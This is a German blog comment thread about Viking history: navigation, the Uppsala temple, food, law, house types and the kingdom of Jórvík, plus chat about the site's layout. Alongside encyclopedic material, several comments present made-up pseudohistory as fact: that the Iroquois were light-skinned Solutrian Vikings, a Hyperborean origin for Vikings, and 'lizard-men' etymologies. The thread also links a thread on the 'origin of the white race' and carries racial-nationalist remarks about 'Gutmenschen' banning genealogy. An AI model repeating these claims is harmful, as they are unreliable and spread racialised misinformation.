    Mit einem Peilkompass kann man sichtbare Landmarken anpeilen um die Schiffsposition zu bestimmen. Schon die Wikinger benutzten Peilscheiben (Marke links), mit der allerdings der Sonnenschatten gemessen wurde. Siehe hierzu die Navigationsseite. Der Peilkompass hat einen Peilaufsatz (auf der rechten Marke links) mit dem man das zu peilende Objekt anvisiert und dann die Richtung am Kompass abliest. Daraus wird dann eine Standlinie berechnet und in die Seekarte eingetragen. Auf dieser Linie befindet sich das Schiff.

    http://www.forschung-und-wissen.de/archaeologie/wikinger-benutzten-sonnensteine-als-kompass-3571914/
    Reisrouten:

    http://www.neuseddin.eu/wikinger-alle.html

    Gefällt 1 Person

    Antworten

  4. Der Tempel von UPPSALA..
    Der Tempel von Uppsala war ein vermutetes Tempelgebäude in Alt-Uppsala, welches das Zentrum des heidnischen Glaubens der Svear (Schweden..)dargestellt haben soll.
    Die wichtigste Quelle für die Existenz des Tempels ist Adam von Bremen, der 1070 in seiner Chronik schrieb: “Noch in den sechziger Jahren des 11. Jahrhunderts stand der mächtige Tempel von Uppsala auf seinem Platz, obwohl Olof Skötkonung schon ein halbes Jahrhundert vorher dessen Zerstörung geplant hatte. Er bestand aus einem völlig vergoldeten Gebäude und in diesem thronten Abbildungen der heidnischen Götter.”
    Adam von Bremen war aber nie selbst vor Ort. Sein gesamter Bericht beruhte auf Gesprächen mit dem dänischen König Sven Estridsson und auf Informationen, die er von Gesandten am dänischen Hof erhielt, deren Zuverlässigkeit zweifelhaft ist, zumal König Olof Skötkonung ein halbes Jahrhundert vorher befohlen hatte, alle heidnischen Heiligtümer zu zerstören. Speziell über den Tempel in Uppsala geben andere alten Legenden an, dass er um 1088 durch die Anhänger Inge I. niedergebrannt wurde. Mit allem, was man heute über die Opferfeste der Svear weiß, kann der „Tempel“ auch im Freien auf einer heiligen Wiese gelegen haben. Archäologisch gibt es keinen Hinweis auf einen Tempel. In der Umgebung der Königshügel von Alt-Uppsala hat man auch Reste von Langhäusern gefunden. Es ist möglich, dass hölzerne Götterfiguren in einem Teil der Langhäuser untergebracht waren. Andererseits könnten sie auch nur während der Opferfeste aufgestellt worden sein.
    Die Grundmauern unter der gegenwärtigen Kirche in Alt-Uppsala, die man gefunden hat, können genauso gut eine frühere Kirche oder eine Scheune oder ein Tempel gewesen sein. Das Bauwerk war jedoch nicht besonders prächtig und anspruchsloser, als von Carl Larsson in seinem Gemälde dargestellt. Was man heute über das heidnische Opfern (blot), die Svear und diese Zeit weiß, deutet darauf hin, dass mit dem Wort „Tempel“ genauso gut ein Platz außerhalb eines Gebäudes in einem heiligen Hain oder an einer Quelle gemeint gewesen sein kann.
    Im Hintergrund des Wandgemäldes Midvinterblot von Carl Larsson, das im Nationalmuseum von Stockholm zu sehen ist, hat der Maler den imaginären Tempel dargestellt. Auf dem Bild opfern die Svear ihren König Domalde.

    Ende.

    Gefällt 1 Person

    Antworten

  5. Allerdings wurden die Aussenwände mit grossflächigen Platten aus Baumrinde(weil ausreichend vorhanden..) belegt.Die Bauform ist aber ansonsten identisch!
    Waren die IROKESEN eigentlich WIKINGER?Also UR-Solutrier—-?
    Sagen
    Edda,(Skandinavien und Norddeutschland)
    http://www.lokis-mythologie.de/Edda.html
    und die isländische Egils-Saga
    de.wikipedia.org/wiki/Egils_saga
    http://www.algonet.se/~runesilk/silke/RS1.htm
    Bock-Saga(Finnland)
    http://politikforen.net/showthread.php?109049-Die-Bocksaga-%E2%80%93-%C3%9Cber-den-Ursprung-der-wei%C3%9Fen-Rasse
    http://www.mousewaggler.co.uk/bocksaga/MainPage.asp?Id=25&Section=The%20Bock%20Sa-Ga%20Pt%20I
    http://en.wikipedia.org/wiki/House_of_Ynglings
    http://www.archive.org/stream/egilssagaskalla00finn/egilssagaskalla00finn_djvu.txt
    http://www.die-jorviker.de/Jorvik.html
    Jorvik to Scandinavian York. Jórvík may be the correct Icelandic spelling of Jorvik,
    http://jorvik-viking-centre.co.uk/
    http://en.wikipedia.org/wiki/Gamla_Uppsala
    Die Ahnen der JörViker, (Yorker, Jorke)kamen aus Uppsala…..>

    Niedergeschrieben von Adam von Bremen:
    An diesem Punkt sage ich ein paar Worte über den religiösen Glauben der Schweden(Nordmänner, Vikings..).Dieses Volk hat einen aussergewöhnlichen TEMPEL(!) der Uppsala genannt wird, nicht weit von der Stadt “SIGTUNA”**.In diesem Tempel , gebaut aus GOLD(!)..beten die Menschen die 3 Götterstatuen an!
    http://en.wikipedia.org/wiki/Adam_of_Bremen
    aus..

    Gefällt 1 Person

    Antworten

  6. Ernährung
    Neben Fisch und Getreide standen Tiere (vor allem Lamm, Rind, Schwein, Ziege und Pferd, hier
    und da auch Hunde, Katzen und Gänse) sowie Wildkräuter und -früchte auf dem Speiseplan vieler Wikinger. Kohl, Erbsen und Zwiebeln gehörten zu den wichtigsten Gemüsearten, also Gemüse, die die skandinavische Volksküche bis heute prägen. Wo kein Getreide angebaut wurde, hat man Brot sogar aus Erbsen und Kiefernborke hergestellt. Insbesondere die Getreideprodukte enthielten durch die groben Mühlsteine immer wieder Kies und andere Verunreinigungen, so daß schlechte Zähne die logische Folge waren. Salz zur Haltbarmachung von Speisen wurde aus Meerwasser gewonnen. Auch Einlegen in Salzwasser oder Trocknen waren als Konservierungsmethoden bekannt.
    Die Wikingerfrauen stellten Bier und Met her, auch Obstweine waren bekannt. Dabei wohnten die Familien überwiegend in Gemeinschaftshäusern oder auf großen Gutshöfen. Auch die Sauna war bereits erfunden: In einer Art Schwitzbad fand auch die Körperpflege statt. Die einzelnen Siedlungen waren weitgehend autark. Die Nahrung wurde selbst hergestellt bzw. konserviert, die notwendigen Geräte wurden selbst geschnitzt, auch die angesehenen Schmiede waren in jeder größeren Ansiedlung vertreten.
    Religionsfreiheit
    Die überraschende Toleranz der Wikinger in Bezug auf die Religion sogar innerhalb der eigenen Familie erklärt die Schwierigkeiten der christlichen Missionierung: Für viele Wikinger war es unproblematisch neben ihren eigenen religiösen Vorstellungen eine weitere zu übernehmen, ohne sich dabei vom bisherigen Glauben lösen zu müssen.
    Gänzlich neu für die Wikinger war die Unterscheidung zwischen Gut und Böse im Christentum, da ihnen moralische Kategorien im mitteleuropäischen Sinne fremd waren. Sie unterschieden zwischen nützlichen und bedrohlichen Kräften und glaubten nicht an eine überirdische richtende oder strafende Instanz, was zum Ruhm ihres Muts und der fehlenden Angst beigetragen haben mag.
    Gerichtsbarkeit
    Der Thing war die Versammlung der freien Wikinger bzw. – in Zeiten der sich bildenden regionalen oder staatsähnlichen Gebilde und schließlich der skandinavischen Staaten – ihrer Anführer. In zum Teil tage- oder wochenlangen Treffen unter freiem Himmel, häufig zur Zeit der Sommersonnenwende, wurden Regeln und Gesetze ausgearbeitet und Urteile in Streitfällen getroffen.

    Architektur
    In Nordnorwegen, Grönland, Neu Fundland und Island waren die Bedingungen ungefähr die gleichen. Es war kein Bauholz vorhanden und es galt einem sehr rauen und Lebensunkfreundlichen Klima zu trotzen. Dies führte dazu, dass Häuser aus Grassoden und Steinen gebaut wurden.
    Es gab 2 Arten von Häusern, die die Stallungen in direkter Verbindung zum Wohnhaus, und die etwas abseits davon die Stallungen hatten.
    Die Fyrhathäuser

    Diese Häuser waren um einiges größer als die aus Heitabu. Sie waren auch aus Holz gebaut und besaßen ein buckeliges Dach aus Holzschindeln. Die Vaabasse-Langhäuser
    Diese Häuser waren ein gutes Stück größer als die Fyrhathäuser, und waren auch was die Konstruktion angeht anders gebaut. Es befanden sich keine Außenstützen an den Wänden und das Schindeldach war durch ein Reetdach ersetzt.
    Aufsehen erregende Funde in Nordamerika(Nord-usa und Kanada) legen nahe das die Irokesen(wahrscheinlich Solutrier..) hellhäutig, gross gewachsen ..auch diesen Langhaus-Baustil pflegten..

    Gefällt mir

    Antworten

  7. Wikinger in der Normandie.. England/YORK .. oder Haithabu und Hammaburg(Hamburg)…oder im „Altenland“: YORK an der Elbe.
    Sowie entlang der Nordseeküste.
    Vor der Wikingerzeit hiessen sie >Boräer(Aus dem hohen Norden das legendäre Hyper-Boräa)..davor nannte man sie Solutrianer..(in einer der Eiszeit-en)

    Königreich Jórvík(Jervik/Jöervik)
    Das Königreich Jórvík mit der Hauptstadt Jórvík (das spätere York) war ein Territorium der Normannen in Nordengland. Die Könige kontrollierten neben ihrem eigentlichen Gebiet (im Wesentlichen Northumbria) zeitweise auch die Gegend um Dublin, die Isle of Man und die Five Boroughs of Mercia. Umgekehrt saßen auch die Könige von Dublin auf dem Thron, die Könige von Wessex annektierten das Gebiet, wobei sie den Titel zu dem eines Earl of York herunterstuften.
    Die Jörviker Normannen kamen aus Südschweden…(Jörvik= Pferdebucht)

    Genealogie wird wohl bald von den irren Gutmenschen verboten!
    Man soll ja nicht mehr wissen wo wir herkommen, wer wir sind.
    Ziel ist der Einheitsmenschenbrei..ohne Anfang und ohne Ende.

    … ab ins dunkle der Zukunft.

    September 2013 um 20:00 | Antwort
    goetzvonberlichingen

    Die Wiege der Nordmenschen..SIGTUNA , wo Schweden began!
    Niedergeschrieben von Adam von Bremen:
    An diesem Punkt sage ich ein paar Worte über den religiösen Glauben der Schweden(Nordmänner, Vikings..).
    Dieses Volk hat einen aussergewöhnlichen TEMPEL(!) der Uppsala genannt wird,
    nicht weit von der Stadt “SIGTUNA”.In diesem Tempel , gebaut aus GOLD…..
    ..beten die Menschen die 3 Götterstatuen an!

    Wikinger, Nordmänner, Skandinavier

    Von dem altnordischen Wort wik,(Vik) das soviel wie “Bucht” oder “Handelshafen” bedeutet oder auch von dem altnordischen Begriff vikingr.
    Sie waren kluge Händler, geschickte Seefahrer, ausgezeichnete Handwerker und Schiffsbauer. Weltmeerbezwinger.
    Sie handelten Waren bis nach Bagdad und kamen auf ihrer Landsuche bis nach Amerika.
    Sie waren großartige Geschichtenerzähler. Ihre Gesellschaft war vergleichsweise offen und demokratisch.
    Die Wikinger kamen als Abenteurer, Eroberer und Händler aus Norwegen, Schweden und Dänemark.
    Die Herkunft ihres Namens ist nicht eindeutig geklärt. Wahrscheinlich ist, dass sich der Name aus dem altnordischen Wort für “Wik”, das Bucht bedeutet, oder von der Wortwurzel “Wig” für Kampf herleitet. In Frankreich nannte man sie Normannen oder Nordmannen.
    Die Wikinger lebten von Fischfang, Ackerbau und Viehzucht, doch der Mangel an fruchtbarem Land setzte ihnen Grenzen. Ende des 8. Jahrhunderts richteten sie ihre Beutezüge vor allem gegen die Britischen Inseln.
    Sie erfanden zwei verschiedene Kompasse…und die schnellsten Schiffe.
    Sie waren exzellente Schiffsbauer, großartige Seeleute und phantasievolle Künstler. Dank ihrer hochseetüchtigen Schiffe war es den Wikingern möglich, sich weit über die damals bekannten Horizonte hinauszuwagen. Auf der nördlichen Route über Schottland, die Faröer- und Shetland-Inseln, Irland und Island entdeckten und besiedelten sie Grönland und Neufundland.
    Es gilt als sicher, dass die Wikinger 500 Jahre vor Kolumbus Amerika entdeckten. Ausgrabungen in Neufundland beweisen, dass bis ins 14. Jahrhundert Handelsverbindungen zwischen Grönland und Nordamerika bestanden. Die Wikinger drangen über russische Flüsse nach Osteuropa vor, gelangten zur Halbinsel Krim, nach Konstantinopel und in den Orient. Es begann ein Zeitalter der Entdeckungen, des Handels und der Besiedelung. Zwischen dem 9. und 12. Jahrhundert war kein europäisches Land vor den Wikingern sicher.
    Sie gründeten nach der Besetzung Englands das Königreich “Jöervik”(Jerwik) aus dem das spätere YORK enstandt.

    Handwerk, Kunst, Kultur und Schrift
    Die Lieder der Edda und die nordischen Sagas beschreiben das abenteuerliche Leben der Nordmänner. Die Sagas und Dichtungen wurden mündlich überliefert und erst Jahrhunderte nach der Wikingerzeit aufgeschrieben. Die Wikinger selbst hinterließen lediglich Runensteine mit Inschriften.
    Die Runen
    Katholische Mönche des Mittelalters glaubten, dass die wikingischen Heiden Analphabeten waren. Tatsächlich benutzten die Wikinger aber schon lange vor Einführung des lateinischen Alphabets ihre eigene Schrift: die Runen. In der Mythologie ist überliefert, dass geheimnisvolle Kräfte in den Zeichen liegen.
    Die Wikinger schrieben nicht mit Tinte oder Pergament, sondern schnitzten Buchstaben mit einer Messerspitze in Holz, Metall, Stein oder Knochen. In der englischen Sprache bedeutet das Wort “write” ursprünglich “mit einem scharfen Werkzeug einkerben”.
    Niederlassungen, Handelsplätze .. Stadt-und Staatsgründungen
    Welche Ursachen hatte die gewaltige Expansion im Laufe von nur wenigen Generationen? Stabile Staatsgründungen wie das Fränkische Reich und die angelsächsischen Königtümer in England hatten den Angreifern offensichtlich wenig entgegenzusetzen. Das Bild, das uns die schriftlichen Quellen vermitteln, ist vermutlich davon gefärbt; die Wikinger werden als schreckliche Räuber und Banditen dargestellt. Sicherlich waren sie das, aber sie müssen außerdem noch andere Eigenschaften gehabt haben. Einige ihrer Führer müssen höchst fähige Organisatoren gewesen sein. Zwar konnte mit Hilfe einer wirkungsvollen militärischen Taktik ein Krieg gewonnen werden; außerdem aber gründeten die Wikinger in eroberten Gebieten Königtümer. Einige wie zum Beispiel in Dublin und York überlebten die Wikingerzeit nicht; Island aber ist noch immer eine blühende Nation. Das Wikingerkönigtum in Kiew wurde zur Basis des Russischen Reiches, und die Spuren des hervorragenden Organisationstalents der Wikingerhäuptlinge sind noch heute deutlich sichtbar auf der Isle of Man und in der Normandie. In Dänemark hat man vom Ende der Wikingerzeit die Überreste von Verteidigungsanlagen gefunden, die als Sammelplatz für große Armeen dienten. Die Burgen sind kreisrund und in Quadranten aufgeteilt, mit quadratischen Gebäuden in jedem der vier Abschnitte. Die Burgen sind mit einer Präzision angelegt, die den ausgeprägten Sinn der Führer für Systematik und Ordnung bezeugt. Am Hof des dänischen Königs muß es gründliche Kenntnisse über Landvermessung und Geometrie gegeben haben.

    Gefällt mir

    Antworten

      1. Hallo Eric!
        Danke für Deine Antworten bezüglich Kelten und Wikinger. Eine etwas persönlichere wäre mir trotzdem lieber gewesen.
        Danke auch für die Sternchen.:-)
        Schöne Grüße

        Gefällt 1 Person

      2. Bitteschön keine Ursache leider ist die Masse an Infos so immens das ich nicht immer jedem persöhnlich antworten kann habe immer mehrere Netzwerke offen um Nachrichten zu lesen und zu posten ich bitte es mir nach zusehen wenn ab und an etwas zu kurz kommt einen schönen tag noch mit deutschem Gruss Eric

        Gefällt mir

  8. „Amboss ist immer härter als jeder Hammerschlag.“

    Genau, der Am ist der Boss, wie es der Name schon sagt.

    Kannst du mir zufällig erklären, wo die Wikinger ursprünglich her gekommen sind?

    Der Tecuteli (siehe Internet), ein Sprachforscher und seiner Meinung nach mächtig des Althochdeutschen „Teodisch“, übersetzt das Wort „Keltenkrieger“ als „die Krieger, die aus dem kalten (Weltall) kamen. Nun, mich überzeugt das nicht so ganz.

    Die Kelten (zählen die zu den Wikingern?, wenn ja, dann kamen die immer mit ihren Drachenbooten, aber diese waren doch keine Raumschiffe.

    Würde mich über eine mich aufklärende und mir auch zusagende Antwort freuen. Danke dafür im voraus.

    Gefällt mir

    Antworten

      1. Also mir ging es ja um die Wikinger.
        In wikipedia steht dazu u.a.: „Adam von Bremen schreibt: „Sie sind wirklich Piraten, die jene Wikinger nennen, wir Eschenmänner“.

        Zum eigentlichen Ursprung steht da nichts.
        Das Wort „Eschenmänner“ finde ich aber interessant. Es erinnert mich auch an meinen hier verwendeten Vornamen EDESCH. Ich weiß ja, was dieser bedeutet.
        Vielleicht ist mit Eschenmänner auch Echsenmänner gemeint, denn was sollten Seefahrer mit dem Baum, die Esche, zu tun haben. Außerdem kommt das mit den von den Wikingern verwendeten DRACHENBOOTEN hinzu, deren Rumpf ein Drache bzw. eine Schlange = Echse darstellt
        Anders wiederum kann das Wort auch ASCHE bedeuten, denn in meinem Dialekt bedeutet Esche genau das – z.B.Asche von verbranntem Holz.
        Und geht man ganz, ganz weit zurück in der Geschichte, dann landet man so bei Aschpiru (hat nichts mit Aspirin zu tun!) bzw. A(s)piru.bzw. Apiru.
        Hierzu steht wieder in Wikipedia: „Für Altägypten liegen verschiedene Namensbedeutungen vor. Der Begriff ˁpr(w) konnte für Schiffsmannschaft, Kompanie, Winzer und Traubenkelterer angewendet werde.“
        Was also hinkommt, denn Schiffsmannschaft als räuberische Wikinger gehen durch.
        Die Apiru stehen aber auch irgendwie in Beziehung zu den Hebräern (Ebreer, Ebersleuten – denn wie sagt man heute noch zur Kriegsmarine? Man sagt verulkend Seeschweine zu den Matrosen).
        Die an Land gebliebenen Wikinger nannte man Germanen.
        Stimmst du ungefähr zu, beim hier berichteten?

        Oder was ist deine persönliche Meinung zum URsprung der Wikinger? Ich meine auch das Gebiet, wo sie mal hergekommen sind.

        Gefällt 1 Person

      1. Hallo Eric, ich hätte da mal eine ganz andere Frage: Dein Gravatar mit diesem ‚Sensenmann in diesem roten Kreis‘ … kann man das irgendwo ‚in groß‘ aufrufen? Gefällt mir einfach zu gut, der Kerl – würd ihn mir gern auf ein Hemd drucken (lassen)…😆

        Gefällt 1 Person

      2. Dein Gravatardingsda, der Tod kommt aus einem schwarzen Loch. Ich fürchte, das beruht auf einem Denkfehler. Der Tod klimmt gewöhnlich in ein schwarzes Loch hinein und das Leben ist eigentlich das, was dann von da wieder herauskommt. Das ist einfach ein natürlicher Vorgang. Man könnte es auch Biomechanik nennen.

        „Valvater Odin“

        Ich würde mich sehr dafür interessieren, wie du dir den vorstellst.

        Gefällt mir

  9. ok ok versteh, ich glaub ich such mir um mit dir zu schreiben lieber ein anderes Medium aus😀
    kannst bitte alle 3 Komments löschen, schreib danach auch gern nochmal ein ordentlichen neuen.

    Ich denke ich hab’s durchschaut😀
    also… dein system erkannt…

    Nur wenn man auf startseite klickt – ist man verloren.😀

    Gefällt 1 Person

    Antworten

      1. Was verstehst du, wenn ich Fragen darf :p
        Ich wollte keine Kritik an deinem alten Design ausüben!
        Keineswegs!
        Eigentlich wollte ich nur ein eventuellen Fehler den du verursacht haben konntest, dir erzählen, damit dieser, (für den Fall dass er da gewesen wäre) Ihn auszumachen und zu beseitigen.

        Ich selbst habe genau mit dem selbigen auch ähnliche ‚problemchen’…
        Mit der einfachkeit der Strukturierung bzw. dem design meiner webpage ….

        Wahrscheinlich, weil ich das immer nur halbherzig angehe….
        aber hab demnächst mehr Zeit und will/muss AUFRÄUMEN … ^^
        gruß koka

        PS. wenn du mich fragst, dann empfand ICH persöhnlich, das alte etwas angenehmer, als das jetztige😉

        Gefällt mir

  10. @Eric der Wikinger
    Ist das so gewollt, dass man einzig & allein,
    NUR zur Startseite navigieren kann,
    und von dort aus,
    man NIERGENDWO hinkommt.

    Oder „Baustellen-Re-Design-Modus“?
    Bitte um Antwort, möchte nur eventuellen flüchtigkeistfehler ausschließen.

    Wenn der BaustellenModus gewonnen hat, bitte ich diesen Kommentar,
    Kommentarlos zu löschen und als nicht da gewesen zu betrachten.

    mfg koka =)

    Gefällt 1 Person

    Antworten

Schreibe einen Kommentar

Bitte logge dich mit einer dieser Methoden ein, um deinen Kommentar zu veröffentlichen:

WordPress.com-Logo

Du kommentierst mit Deinem WordPress.com-Konto. Abmelden / Ändern )

Twitter-Bild

Du kommentierst mit Deinem Twitter-Konto. Abmelden / Ändern )

Facebook-Foto

Du kommentierst mit Deinem Facebook-Konto. Abmelden / Ändern )

Google+ Foto

Du kommentierst mit Deinem Google+-Konto. Abmelden / Ändern )

Verbinde mit %s